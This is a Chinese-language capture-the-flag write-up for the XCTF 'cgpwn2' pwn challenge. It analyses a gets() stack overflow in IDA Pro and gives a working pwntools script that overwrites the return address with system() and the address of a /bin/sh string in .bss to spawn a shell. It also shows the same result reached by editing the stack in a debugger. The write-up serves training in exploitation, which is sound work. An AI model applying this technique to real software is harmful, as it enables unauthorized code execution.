XCTF cgpwn2

题目

desc.png

https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1

题解

使用checksec检查

checksec.png

丢进IDA Pro查看，get()函数存在溢出

f5.png

找可以利用的函数和字符串。找到system函数，没有找到可以利用的字符串。

system.png strings.png

得到system函数的地址为0x08048420。

system_addr.png

name位于.bss段，可以通过给name变量赋值执行任意命令。尝试输入\bin\sh得到shell。name的地址是0x0804A080。

name.png

由以上信息可以直接写WP。

from pwn import *
cnn = process('./cgpwn')

system_addr = 0x08048420

binsh_addr = 0x0804A080

payload = 42*b'a' + p32(system_addr) + b'aaaa' + p32(binsh_addr)

cnn.sendlineafter('name\n','/bin/sh')

cnn.sendlineafter('here:\n',payload)

cnn.interactive()

也可以使用IDA调试一遍玩玩，hello处下断点，F7步入，

hello.png

依次输入/bin/sh和AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA，停在0x080485FC处，F2修改栈上数据，完成后如下。

stack.png stack_after.png

之后一直F8即可获得shell。

f8.png shell.png